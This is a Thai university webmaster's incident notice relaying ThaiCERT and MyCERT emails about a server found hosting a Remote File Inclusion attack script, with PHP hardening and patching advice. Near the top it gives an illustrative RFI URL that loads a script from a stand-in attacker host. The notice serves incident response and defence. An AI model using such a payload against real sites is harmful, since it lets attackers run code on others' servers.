แจ้งการถูกโจมตีด้วย Remote file inclusion
วันอังคารที่ 29 กันยายน 2552 ได้รับแจ้งจาก ThaiCERT เกี่ยวกับการโจมตีเครื่องแม่ข่ายด้วย Remote file inclusion ซึ่งเป็นเทคนิคการเรียกใช้งานข้ามเครื่องแม่ข่าย เช่น
**URL สมมุติ ****
http://www.mydomain.com/index.php?page=http://www.hacker.com/hackscript.php?
โดยสามารถติดตั้งโค๊ดต่าง ๆ ลงบนเครื่องแม่ข่ายได้ทันที ทางแก้ไขเบื้องต้นสำหรับผู้ดูแลระบบเครือข่ายและผู้ดูแลเครื่องแม่ข่ายคือ แก้ไขค่าพารามิเตอร์ของ php.ini ดังนี้
1. register_globals = Off
2. allow_url_fopen = Off
และคอยตรวจสอบการอัพเดทของ CMS และ ระบบปฏิบัติการอย่างต่อเนื่อง รวมไปถึงการเปิดพอร์ตที่จำเป็น(Firewall) สำหรับเครื่องคอมพิวเตอร์แม่ข่ายเท่านั้น เพื่อป้องกันการบุกรุก/โจมตีจากผู้ไม่หวังดี
จาก: [ThaiCERT]: jedsada [ir@thaicert.org]
ส่ง: 28 กันยายน 2009 11:30
ถึง: webmaster rmutl
สำเนาถึง: thaicert@nectec.or.th
เรื่อง: [ThaiCERT #909280058] โปรดดำเนินการโดยเร่งด่วน::RFI hosting 58.137.170.75
> [jedsada – Mon Sep 28 11:30:12 2009]:
>
> —–BEGIN PGP SIGNED MESSAGE—–
> Hash: SHA1
>
> เรียน ผู้ดูแลระบบเว็บไซต์ http://reg1.rmutl.ac.th
>
> ทีมงานได้รับแจ้งจาก CyberSecurity Malaysia
> ว่าเครื่องเว็บเซิร์ฟเวอร์ http://reg1.rmutl.ac.th/ บนไอพีแอดเดรส
> 58.137.170.75
> ในความดูแลของท่านถูกโจมตีด้วย Remote file inclusion
> เป็นไฟล์สคริปต์ที่ถูกฝังลงบนเครื่อง
> เซิรฟ์เวอร์ของท่านสาเหตุอาจจะเกิดจากช่องโหว่
> บนเครื่องที่เปิดให้บริการซึ่งเป็นช่องทางให้แฮกเกอร์เข้าฝังสคริปต์ลงบนเ
> ครื่องเพื่อที่ดูข้อมูลสำคัญ
> ต่างๆบนเครื่องหรือใช้เครื่องบริการดังกล่าวเป็น
> ช่องทางในการโจมตีหรือบุกรุกเครื่องเซิรฟ์เวอร์อื่นๆ
> ที่อยู่บนระบบเครือข่ายอินเตอร์เน็ตตามลิงก์นี้
> http://reg1.rmutl.ac.th/con/con
>
> การดำเนินการ[เร่งด่วน]
> (แจ้งผู้เช่าบริการให้ดำเนินการ)
> (หากไฟล์ดังกล่าวไม่ใช่สิ่งที่ท่านติดตั้งไว้)
> ให้ทำการลบไฟล์ดังกล่าว
> แล้วทำการตรวจสอบและอัพเดตระบบปฏิบัติการพร้อมโปรแกรมต่างๆ
> เช่น โปรแกรมจำพวก CMS เป็นต้น เพื่ออุดช่องโหว่ ไม่ให้มีการบุกรุก
> เข้าระบบของท่านได้อีก
>
> คำแนะนำเพิ่มเติม
> 1. ปิดบริการ (port/service) ต่างๆ ที่ไม่จำเป็นต่อการใช้งานเช่น
> เครื่องดังกล่าวไม่เปิดบริการเว็บไซด์ http port 80 หรือ ftp (21/tcp),
> telnet
> (23/tcp) เพื่อลดช่องทางการโจมตี หรือการเข้าครอบครอบเครื่องเซิร์ฟเวอร์
> จึงควรเปิดเฉพาะบริการที่จำเป็นต่อการใช้งานเท่านั้น
> และต้องหมั่นตรวจสอบช่องโหว่สำหรับบริการนั้นๆ
> พร้อมทำการอัพเดตโปรแกรมอุดช่องโหว่
> (patch) เสมอ
> 2. การตั้ง/กำหนด password เป็นสิ่งสำคัญหากกำหนด Password
> ไม่เหมาะสมส่งผลให้แฮกเกอร์ใช้โปรแกรมเดา password ได้โดยง่าย
> 3.ติดตามข่าวสารด้านความปลอดภัยจากแหล่งข่าวที่น่าเชื่อถือต่างหรือรับบริ
> การแจ้งข่าวสารจากทาง
> ThaiCERTซึ่งสามารถสมัครได้จาก
> http://www.thaicert.nectec.or.th/mailinglist/register.php
>
> ทีมงานหวังเป็นอย่างยิ่งว่าคำแนะนำจะช่วยท่านได้ในระดับหนึ่ง
> และหากมีความคืบหน้าประการใดเกี่ยวกับเหตุการณ์นี้
> กรุณาแจ้งกลับมายังทีมงาน ThaiCERT
> จักขอบพระคุณเป็นอย่างยิ่ง
>
> ด้วยความนับถือ
> เจษฎา ทองก้านเหลือง
> ศูนย์ประสานงานการรักษาความปลอดภัยคอมพิวเตอร์ ประเทศไทย (ThaiCERT)
> ศูนย์เทคโนโลยีอิเล็กทรอนิกส์และคอมพิวเตอร์แห่งชาติ (NECTEC)
> 112 อุทยานวิทยาศาสตร์ประเทศไทย ถนนพหลโยธิน
> ตำบลคลองหนึ่ง อำเภอคลองหลวง
> จังหวัดปทุมธานี 12120
> โทรศัพท์: 0-2564-6868
> โทรสาร: 0-2564-6871
> E-mail: thaicert@nectec.or.th
>
> > —–BEGIN PGP SIGNED MESSAGE—–
> > Hash: SHA1
> >
> > Dear Administrator,
> >
> > Regarding the above matter, you received this email because you are
> > listed as the contact for the domain name in the whois lookup.Please
> > let us know if you are no longer the point of contact for this IP
> > address for our record.
> >
> > What is Remote File Inclusion (RFI)?
> > – ————————————
> > Remote file inclusion or commonly known as RFI is a form of attack
> where
> > the attacker try to inject their own code inside the web
> applications. If
> > an attacker can successfully achieve this, they will be able to
> execute any
> > code they wish on the web server.
> >
> > More details at:
> >
>
http://www.mycert.org.my/en/resources/web_security/main/main/detail/662/index.html
> >
> > MyCERT is aware that a host under your administration is hosting a
> > malicious script used in an RFI attack.
> >
> > Domain Name = reg1.rmutl.ac.th
> > Ip = 58.137.170.75
> > ASN = 4750
> > Country = TH
> >
> > File/s below is/are exist as last check on Sun Sep 20 04:37:19 +0800
> 2009
> >
> > 1 – http://reg1.rmutl.ac.th/con/con
> >
> >
> > In addition, please investigate your machine for any indications of
> > compromise. If the machine is confirmed to have been compromised,
> please
> > disconnect it from the network and do the necessary before getting
> it back
> > online.
> >
> > If you are not the right point of contact to deal with this incident
> > then we would appreciate it very much if you could forward this to
> > the
> correct
> > party.
> > Furthermore, if you are already aware of this incident then we would
> like to
> > apologize for the inconvenience.
> >
> > We appreciate your prompt response and welcome your feedback. Thank
> you in
> > advance for your assistance.
> >
> >
> > **************************************************************
> > For correspondence regarding the above issue, please retain the
> > above subject header: [MyCERT-200909201042310] to ensure effective
> > response.
> > **************************************************************
> >
> > Regards,
> >
> > –
> ———————————————————————-
> —
> > MyCERT provides free technical advises to local organizations and
> > individuals pertainingt to computer/system/network security and
> incident
> > response.
> > –
> ———————————-+———————————–
> ———————————-+—
> > Malaysian Computer Emergency | E-mail: mycert@mycert.org.my
> > Response Team | Cyber999 Hotline: 1 300 88 2999
> > (MyCERT) | Fax: (603) 8945 3442
> > CyberSecurity Malaysia | Phone: (603) 8992 6969
> > Level 7, Sapura@Mines | Office hour: 0830-1730 MYT (Mon-
> Fri)
> > 7, Jln Tasik, The Mines | 24×7 Phone: 019-266 5850
> > Resort City, 43300 Seri Kembangan | SMS: 019-281 3801
> > Selangor. MALAYSIA | URL: http://mycert.org.my/
> > –
> ———————————-+———————————–
> ———————————-+—
> > Disclaimer
> > The information transmitted in electronic mail messages sent from
> > mycert.org.my domain is intended only for the person(s) or
> > entity(ies) to which it
> is
> > addressed, represents the views/points of MyCERT and may contain
> information
> > extracted from various other reliable sources on security issues.
> MyCERT
> > therefore does not accept liability for any errors, or omissions in
> the
> > contents
> > of this message, which arise as a result of e-mail transmission and
> > consequences due to mis-applying of the technical solutions/steps
> > provided. If
> you have
> > received this email by mistake, please notify MyCERT at +603 8992
> 6969
> > or email
> > us at mycert@mycert.org.my
> > –
> ———————————————————————-
> —
> > —–BEGIN PGP SIGNATURE—–
> > Version: GnuPG v1.4.6 (GNU/Linux)
> >
> > iD8DBQFKtYBG0BAFcIK27XERAqnQAKDGwW+ugIqHG/Gp+wA4wxWSVUqE/wCggxh0
> > jZWrBWuhfA5NhMfuCvoX+d0=
> > =yrY9
> > —–END PGP SIGNATURE—–
> >
> >
> >
> > —–BEGIN PGP SIGNED MESSAGE—–
> > Hash: SHA1
> >
> > Dear Sir,
> >
> > We have received your report of the incident. The matter is now
> > being processed by our incident response personnel. We will contact
> > you back in due time which is subjected to the authenticity,
> > urgency, and damage of the incident.
> >
> > Regards,
> > Jedsada.Thongkanluang
> > Thai Computer Emergency Response Team (ThaiCERT) National
> > Electronics and Computer Technology Center (NECTEC)
> > 112 Thailand Science Park, Phahon Yothin Rd.
> > Klong 1, Klong Luang
> > Pathumthani 12120
> > Thailand
> > Tel : 66-2-564-6868
> > Fax : 66-2-564-6871
> > E-mail : thaicert@nectec.or.th
> > Web: http://www.thaicert.org
> >
> >
> > > [mycert@mycert.org.my – Sun Sep 20 08:11:50 2009]:
> > >
> > > —–BEGIN PGP SIGNED MESSAGE—–
> > > Hash: SHA1
> > >
> > > Dear Administrator,
> > >
> > > Regarding the above matter, you received this email because you
> are
> > > listed as the contact for the domain name in the whois
> lookup.Please
> > > let us know if you are no longer the point of contact for this IP
> > > address for our record.
> > >
> > > What is Remote File Inclusion (RFI)?
> > > – ————————————
> > > Remote file inclusion or commonly known as RFI is a form of attack
> > > where the attacker try to inject their own code inside the web
> applications.
> > > If
> > > an attacker can successfully achieve this, they will be able to
> > > execute any code they wish on the web server.
> > >
> > > More details at:
> > >
> >
>
http://www.mycert.org.my/en/resources/web_security/main/main/detail/662/index.html
> > >
> > > MyCERT is aware that a host under your administration is hosting a
> > > malicious script used in an RFI attack.
> > >
> > > Domain Name = reg1.rmutl.ac.th
> > > Ip = 58.137.170.75
> > > ASN = 4750
> > > Country = TH
> > >
> > > File/s below is/are exist as last check on Sun Sep 20 04:37:19
> +0800
> > > 2009
> > >
> > > 1 – http://reg1.rmutl.ac.th/con/con
> > >
> > >
> > > In addition, please investigate your machine for any indications
> of
> > > compromise. If the machine is confirmed to have been compromised,
> > > please disconnect it from the network and do the necessary before
> > > getting
> it
> > > back
> > > online.
> > >
> > > If you are not the right point of contact to deal with this
> incident
> > > then we
> > > would appreciate it very much if you could forward this to the
> correct
> > > party.
> > > Furthermore, if you are already aware of this incident then we
> would
> > > like to
> > > apologize for the inconvenience.
> > >
> > > We appreciate your prompt response and welcome your feedback.
> Thank
> > > you in
> > > advance for your assistance.
> > >
> > >
> > > **************************************************************
> > > For correspondence regarding the above issue, please retain the
> > > above subject header: [MyCERT-200909201042310] to ensure effective
> > > response.
> > > **************************************************************
> > >
> > > Regards,
> > >
> > > –
> > >
> ———————————————————————-
> —
> > > MyCERT provides free technical advises to local organizations and
> > > individuals pertainingt to computer/system/network security and
> > > incident response.
> > > –
> > >
> ———————————-+———————————–
> ———————————-+—
> > > Malaysian Computer Emergency | E-mail: mycert@mycert.org.my
> > > Response Team | Cyber999 Hotline: 1 300 88
> 2999
> > > (MyCERT) | Fax: (603) 8945 3442
> > > CyberSecurity Malaysia | Phone: (603) 8992 6969
> > > Level 7, Sapura@Mines | Office hour: 0830-1730 MYT
> (Mon-
> > > Fri)
> > > 7, Jln Tasik, The Mines | 24×7 Phone: 019-266 5850
> > > Resort City, 43300 Seri Kembangan | SMS: 019-281 3801
> > > Selangor. MALAYSIA | URL: http://mycert.org.my/
> > > –
> > >
> ———————————-+———————————–
> ———————————-+—
> > > Disclaimer
> > > The information transmitted in electronic mail messages sent from
> > > mycert.org.my domain is intended only for the person(s) or
> > > entity(ies) to which
> it
> > > is
> > > addressed, represents the views/points of MyCERT and may contain
> > > information extracted from various other reliable sources on
> > > security issues.
> > > MyCERT
> > > therefore does not accept liability for any errors, or omissions
> in
> > > the contents
> > > of this message, which arise as a result of e-mail transmission
> and
> > > consequences
> > > due to mis-applying of the technical solutions/steps provided. If
> you
> > > have
> > > received this email by mistake, please notify MyCERT at +603 8992
> 6969
> > > or email
> > > us at mycert@mycert.org.my
> > > –
> > >
> ———————————————————————-
> —
> > > —–BEGIN PGP SIGNATURE—–
> > > Version: GnuPG v1.4.6 (GNU/Linux)
> > >
> > > iD8DBQFKtYBG0BAFcIK27XERAqnQAKDGwW+ugIqHG/Gp+wA4wxWSVUqE/wCggxh0
> > > jZWrBWuhfA5NhMfuCvoX+d0=
> > > =yrY9
> > > —–END PGP SIGNATURE—–
> > —–BEGIN PGP SIGNATURE—–
> > Version: GnuPG v1.4.2 (MingW32)
> > Comment: Use GnuPG with Firefox : http://getfiregpg.org (Version:
> 0.7.8)
> >
> > iD8DBQFKwDfaqe+UB1NWn2YRAtTBAKCT3Y+RYlbu2Dfm5cgd8g9adbRTQwCg/Ii0
> > lC0GJp2ETUscYa2fJkuePrU=
> > =2QVv
> > —–END PGP SIGNATURE—–
> —–BEGIN PGP SIGNATURE—–
> Version: GnuPG v1.4.2 (MingW32)
> Comment: Use GnuPG with Firefox : http://getfiregpg.org (Version:
> 0.7.8)
>
> iD8DBQFKwDrVqe+UB1NWn2YRAqeFAKCxLlcU3Rt4o9/R9obfz3I8hsu+GgCeN+QN
> 0zRVD+NRYJ6P5PVIRDAvwwk=
> =RRLN
> —–END PGP SIGNATURE—–
>
>